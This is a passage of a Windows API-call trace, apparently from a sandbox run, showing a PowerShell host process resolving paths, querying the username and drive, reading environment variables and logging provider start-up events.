	[0560.662] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0xad310, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0560.662] SetErrorMode (uMode=0x1) returned 0x1
	[0560.662] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0xad520 | out: lpFileInformation=0xad520*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0560.662] SetErrorMode (uMode=0x1) returned 0x1
	[0560.663] GetLogicalDrives () returned 0x4
	[0560.664] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xad080, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0560.665] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0560.665] SetErrorMode (uMode=0x1) returned 0x1
	[0560.666] CoTaskMemAlloc (cb=0x68) returned 0x256970
	[0560.666] CoTaskMemAlloc (cb=0x68) returned 0x256890
	[0560.666] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x256970, nVolumeNameSize=0x32, lpVolumeSerialNumber=0xad4f0, lpMaximumComponentLength=0xad4ec, lpFileSystemFlags=0xad4e8, lpFileSystemNameBuffer=0x256890, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xad4f0*=0x9c354b42, lpMaximumComponentLength=0xad4ec*=0xff, lpFileSystemFlags=0xad4e8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0560.666] CoTaskMemFree (pv=0x256970) 
	[0560.666] CoTaskMemFree (pv=0x256890) 
	[0560.666] SetErrorMode (uMode=0x1) returned 0x1
	[0560.666] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0560.667] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xad230, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0560.667] SetErrorMode (uMode=0x1) returned 0x1
	[0560.668] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xad490 | out: lpFileInformation=0xad490*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0560.668] SetErrorMode (uMode=0x1) returned 0x1
	[0560.668] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xad230, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0560.668] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xad0e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0560.668] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0560.668] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xad010, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0560.668] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0560.669] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xad060, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0560.669] SetErrorMode (uMode=0x1) returned 0x1
	[0560.669] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xad2c0 | out: lpFileInformation=0xad2c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0560.670] SetErrorMode (uMode=0x1) returned 0x1
	[0560.670] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xad060, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0560.670] SetErrorMode (uMode=0x1) returned 0x1
	[0560.670] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xad2c0 | out: lpFileInformation=0xad2c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0560.670] SetErrorMode (uMode=0x1) returned 0x1
	[0560.670] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xad100, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0560.670] SetErrorMode (uMode=0x1) returned 0x1
	[0560.670] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xad360 | out: lpFileInformation=0xad360*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0560.670] SetErrorMode (uMode=0x1) returned 0x1
	[0560.671] CoTaskMemAlloc (cb=0x804) returned 0x2553f0
	[0560.671] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2553f0, nSize=0xad768 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xad768) returned 0x1
	[0560.672] CoTaskMemFree (pv=0x2553f0) 
	[0560.672] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0560.672] GetUserNameW (in: lpBuffer=0x1e2120, pcbBuffer=0xad7a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xad7a8) returned 1
	[0560.672] CoTaskMemFree (pv=0x1e2120) 
	[0560.673] ReportEventW (hEventLog=0x1b7c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f1f860*="FileSystem", lpRawData=0x2f1f5f0) returned 1
	[0560.678] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
	[0560.678] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0560.678] CoTaskMemFree (pv=0x19ae70) 
	[0560.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0560.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0560.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0560.680] CoTaskMemAlloc (cb=0x804) returned 0x2553f0
	[0560.680] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2553f0, nSize=0xad768 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xad768) returned 0x1
	[0560.680] CoTaskMemFree (pv=0x2553f0) 
	[0560.680] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0560.681] GetUserNameW (in: lpBuffer=0x1e2120, pcbBuffer=0xad7a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xad7a8) returned 1
	[0560.681] CoTaskMemFree (pv=0x1e2120) 
	[0560.681] ReportEventW (hEventLog=0x1b7c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f250a0*="Function", lpRawData=0x2f24e30) returned 1
	[0560.702] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
	[0560.702] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0560.702] CoTaskMemFree (pv=0x19ae70) 
	[0562.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0562.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0562.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0562.368] CoTaskMemAlloc (cb=0x804) returned 0x2553f0
	[0562.368] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2553f0, nSize=0xad768 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xad768) returned 0x1
	[0562.368] CoTaskMemFree (pv=0x2553f0) 
	[0562.368] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0562.368] GetUserNameW (in: lpBuffer=0x1e2120, pcbBuffer=0xad7a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xad7a8) returned 1
	[0562.368] CoTaskMemFree (pv=0x1e2120) 
	[0562.369] ReportEventW (hEventLog=0x1b7c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f478c8*="Registry", lpRawData=0x2f47658) returned 1
	[0563.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0563.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0563.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0563.717] CoTaskMemAlloc (cb=0x804) returned 0x2553f0
	[0563.717] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2553f0, nSize=0xad768 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xad768) returned 0x1
	[0563.717] CoTaskMemFree (pv=0x2553f0) 
	[0563.717] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0563.717] GetUserNameW (in: lpBuffer=0x1e2120, pcbBuffer=0xad7a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xad7a8) returned 1
	[0563.717] CoTaskMemFree (pv=0x1e2120) 
	[0563.718] ReportEventW (hEventLog=0x1b7c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f4cce0*="Variable", lpRawData=0x2f4ca70) returned 1
	[0563.725] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
	[0563.725] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0563.725] CoTaskMemFree (pv=0x19ae70) 
	[0563.728] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
	[0563.728] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0563.728] CoTaskMemFree (pv=0x19ae70) 
	[0563.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xad010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0563.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xacf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0563.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xacf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0563.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xacf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0565.121] CoTaskMemAlloc (cb=0x804) returned 0x2553f0
	[0565.121] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2553f0, nSize=0xad768 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xad768) returned 0x1
	[0565.121] CoTaskMemFree (pv=0x2553f0) 
	[0565.121] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0565.121] GetUserNameW (in: lpBuffer=0x1e2120, pcbBuffer=0xad7a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xad7a8) returned 1
	[0565.122] CoTaskMemFree (pv=0x1e2120) 
	[0565.122] ReportEventW (hEventLog=0x1b7c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f608f8*="Certificate", lpRawData=0x2f60688) returned 1
	[0565.681] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
	[0565.681] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0565.681] CoTaskMemFree (pv=0x19ae70) 
	[0565.685] GetLogicalDrives () returned 0x4
	[0565.685] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xad3f0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0565.685] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0565.686] CoTaskMemAlloc (cb=0x20e) returned 0x22b860
	[0565.686] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x22b860 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0565.686] CoTaskMemFree (pv=0x22b860) 
	[0565.688] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
	[0565.688] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0565.688] CoTaskMemFree (pv=0x19ae70) 
	[0565.688] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
	[0565.688] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0565.688] CoTaskMemFree (pv=0x19ae70) 
	[0565.705] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
	[0565.705] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0565.705] CoTaskMemFree (pv=0x19ae70) 
	[0565.707] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
	[0565.707] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0565.707] CoTaskMemFree (pv=0x19ae70) 
	[0565.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xad150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0565.707] SetErrorMode (uMode=0x1) returned 0x1
	[0565.707] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xad3b0 | out: lpFileInformation=0xad3b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0565.707] SetErrorMode (uMode=0x1) returned 0x1
	[0565.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xad150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0565.708] SetErrorMode (uMode=0x1) returned 0x1
	[0565.708] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xad3b0 | out: lpFileInformation=0xad3b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0565.708] SetErrorMode (uMode=0x1) returned 0x1
	[0565.708] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
	[0565.708] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0565.708] CoTaskMemFree (pv=0x19ae70) 
	[0565.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xad2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0565.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xad410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0565.712] SetErrorMode (uMode=0x1) returned 0x1
	[0565.712] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xad670 | out: lpFileInformation=0xad670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0565.712] SetErrorMode (uMode=0x1) returned 0x1
	[0566.981] CoTaskMemAlloc (cb=0x804) returned 0x2553f0
	[0566.981] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2553f0, nSize=0xad9d8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xad9d8) returned 0x1
	[0566.981] CoTaskMemFree (pv=0x2553f0) 
	[0566.981] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0566.981] GetUserNameW (in: lpBuffer=0x1e2120, pcbBuffer=0xada18 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xada18) returned 1
	[0566.982] CoTaskMemFree (pv=0x1e2120) 
	[0566.984] ReportEventW (hEventLog=0x1b7c0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f995e0*="Available", lpRawData=0x2f99370) returned 1
	[0568.345] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
	[0568.345] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0568.345] CoTaskMemFree (pv=0x19ae70) 
	[0568.346] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
	[0568.346] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0568.347] CoTaskMemFree (pv=0x19ae70) 
	[0568.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.354] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
	[0568.354] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0568.354] CoTaskMemFree (pv=0x19ae70) 
	[0568.354] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
	[0568.354] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0568.354] CoTaskMemFree (pv=0x19ae70) 
	[0568.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0568.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
